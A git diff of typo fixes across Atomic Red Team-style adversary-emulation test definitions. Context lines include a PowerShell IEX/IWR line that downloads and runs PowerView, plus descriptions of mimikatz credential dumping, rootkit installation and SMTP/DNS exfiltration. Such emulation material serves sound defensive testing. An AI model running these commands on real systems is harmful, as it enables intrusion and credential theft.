diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index f6ff35f9..27b1f4c2 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -183,7 +183,7 @@ atomic_tests:
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
- Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+ Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
@@ -274,7 +274,7 @@ atomic_tests:
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
- Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+ Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index f1342c9d..444a18e5 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -49,7 +49,7 @@ atomic_tests:
description: |
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
- [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+ [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
supported_platforms:
- windows
diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml
index c351454a..70710a4f 100644
--- a/atomics/T1014/T1014.yaml
+++ b/atomics/T1014/T1014.yaml
@@ -9,7 +9,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
- description: Path to the rootkit source. Used when prerequistes are fetched.
+ description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
@@ -51,7 +51,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
- description: Path to the rootkit source. Used when prerequistes are fetched.
+ description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 2277aab9..ce8b80ac 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
## Atomic Test #9 - DNS Server Discovery Using nslookup
-Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
+Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 9cba7eb8..4b4fd3ff 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -748,7 +748,7 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
-## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+## Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 74f7d336..1c591090 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -362,7 +362,7 @@ atomic_tests:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
name: powershell
-- name: Get-wmiobject to Enumerate Domain Controllers
+- name: Get-WmiObject to Enumerate Domain Controllers
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
description: |
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
diff --git a/atomics/T1027.004/T1027.004.yaml b/atomics/T1027.004/T1027.004.yaml
index 45edd715..6f68b6a9 100644
--- a/atomics/T1027.004/T1027.004.yaml
+++ b/atomics/T1027.004/T1027.004.yaml
@@ -37,7 +37,7 @@ atomic_tests:
description: |
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
- The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
+ The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
supported_platforms:
- windows
diff --git a/atomics/T1027.006/T1027.006.yaml b/atomics/T1027.006/T1027.006.yaml
index 4c0ba870..2157a072 100644
--- a/atomics/T1027.006/T1027.006.yaml
+++ b/atomics/T1027.006/T1027.006.yaml
@@ -5,7 +5,7 @@ atomic_tests:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: |
- The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
+ The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
supported_platforms:
- windows
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index ddd099b0..9dbd63c6 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -188,7 +188,7 @@ atomic_tests:
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
- description: Local path/filename to save the dowloaded file to
+ description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
diff --git a/atomics/T1039/T1039.yaml b/atomics/T1039/T1039.yaml
index 637e633b..fcf668b4 100644
--- a/atomics/T1039/T1039.yaml
+++ b/atomics/T1039/T1039.yaml
@@ -1,7 +1,7 @@
attack_technique: T1039
display_name: Data from Network Shared Drive
atomic_tests:
-- name: Copy a sensitive File over Administive share with copy
+- name: Copy a sensitive File over Administrative share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
description: |-
Copy from sensitive File from the c$ of another LAN computer with copy cmd
@@ -43,7 +43,7 @@ atomic_tests:
del %TEMP%\#{local_file}
name: command_prompt
elevation_required: true
-- name: Copy a sensitive File over Administive share with Powershell
+- name: Copy a sensitive File over Administrative share with Powershell
auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
description: |-
Copy from sensitive File from the c$ of another LAN computer with powershell
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 85b9fb2c..9a26d547 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -24,7 +24,7 @@ atomic_tests:
description: |
Scan ports to check for listening ports with Nmap.
- Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
@@ -167,7 +167,7 @@ atomic_tests:
fruit -noninteractive -consoleoutput
name: powershell
- name: Network Service Discovery for Containers
- auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+ auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
supported_platforms:
- containers
diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml
index 674f5001..ab4ac887 100644
--- a/atomics/T1047/T1047.yaml
+++ b/atomics/T1047/T1047.yaml
@@ -41,7 +41,7 @@ atomic_tests:
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
- if the provided remote host is unreacheable
+ if the provided remote host is unreachable
supported_platforms:
- windows
input_arguments:
diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index 8041baba..14c169df 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -92,7 +92,7 @@ atomic_tests:
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
- Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+ Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml
index b4daf5ff..c918f282 100644
--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -52,7 +52,7 @@ atomic_tests:
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
description: |
- DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
+ DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
supported_platforms: